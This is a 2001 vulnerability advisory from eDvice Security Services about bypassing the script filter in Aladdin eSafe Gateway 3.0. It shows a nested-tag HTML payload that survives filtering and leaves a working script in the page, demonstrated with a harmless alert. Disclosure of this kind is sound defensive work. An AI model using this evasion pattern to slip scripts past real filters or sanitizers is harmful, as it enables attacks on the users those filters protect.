Aladdin eSafe Gateway script filter bypass

From: eDvice Security Services (supportat_private)
Date: Sun May 20 2001 - 10:06:11 PDT

    Product: eSafe Gateway
    Vendor: Aladdin Knowledge Systems (www.ealaddin.com)
    Vesrsion: 3.0 was tested and found vulnerable, earlier versions might be
    vulnerable as well.

    Background
    --------------------
    eSafe Gateway 3.0 is an Internet Content Security product.

    You can configure eSafe Gateway to remove scripts (VBScripts, JavaScripts)
    and other executable tags from incoming HTML documents. Alternatively, the
    administrator can ban certain scripting commands from appearing inside
    scripts. The banned commands will be removed, while the rest of the HTML
    page is left intact.

    The problem
    ----------------------
    Using specially crafted HTML files, an attacker can easily bypass eSafe's
    script filtering mechanism.

    Details
    ----------------------
    Let's say for example that we want the following HTML code to enter an
    organization and the script it contains to be executed:

    <HTML><HEAD></HEAD>
    <BODY>
    <SCRIPT language="JavaScript">
    alert("hi");
    </SCRIPT>
    </BODY></HTML>

    If we run this page through eSafe's filtering engine, the script will be
    filtered and the resulting with the following HTML code:

    <HTML><HEAD></HEAD>
    <BODY>

    </BODY></HTML>

    However, if we create the following code:

    <HTML><HEAD></HEAD>
    <BODY>
    <SCRIPT<script language="javascript"> </script> language="javascript">
    alert("hi");
    </SCRIPT>
    </BODY></HTML>

    Then the inner "<script language="javascript"> </script>" will be extracted
    and we will be left with the following HTML code:

    <HTML><HEAD></HEAD>
    <BODY>
    <SCRIPT language="javascript">
    alert("hi");
    </SCRIPT>
    </BODY></HTML>

    Solution
    Do not rely on eSafe Gateway for HTML filtering until Aladdin fixes the
    problem.

    Discovered by:
    eDvice Security Services
    supportat_private